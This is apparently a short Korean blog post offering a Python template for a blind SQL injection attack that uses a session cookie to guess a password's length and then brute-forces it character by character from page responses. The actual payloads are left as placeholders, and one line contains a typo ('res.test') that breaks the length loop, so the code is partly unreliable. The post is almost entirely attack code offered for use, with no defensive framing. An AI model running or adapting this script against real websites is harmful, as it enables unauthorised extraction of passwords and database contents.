본문 바로가기

Python

Blind SQL Injection code form

import requests

cookies= {'PHPSESSID':'YOUR COOKIES'}
url = 'INSERT URL'
pw = ''

# pw길이 구하기
for i in range(0,99):
    payload = "Paylord 입력"
    new_url = url+payload
    res = requests.get(new_url, cookies=cookies)
    res.raise_for_status()
    if "조건실행" in res.test:
        length = i
        print("length: "+str(length))
        break    

# pw 구하기
for i in range(1,length+1):
    for j in range(48,128):
        payload = "payload 입력"
        new_url = url+payload
        res = requests.get(new_url, cookies=cookies)
        res.raise_for_status()
        if "조건실행" in res.text:
            pw += chr(j)
            print("pw: "+pw)
            break
        
print ("pw : "+pw)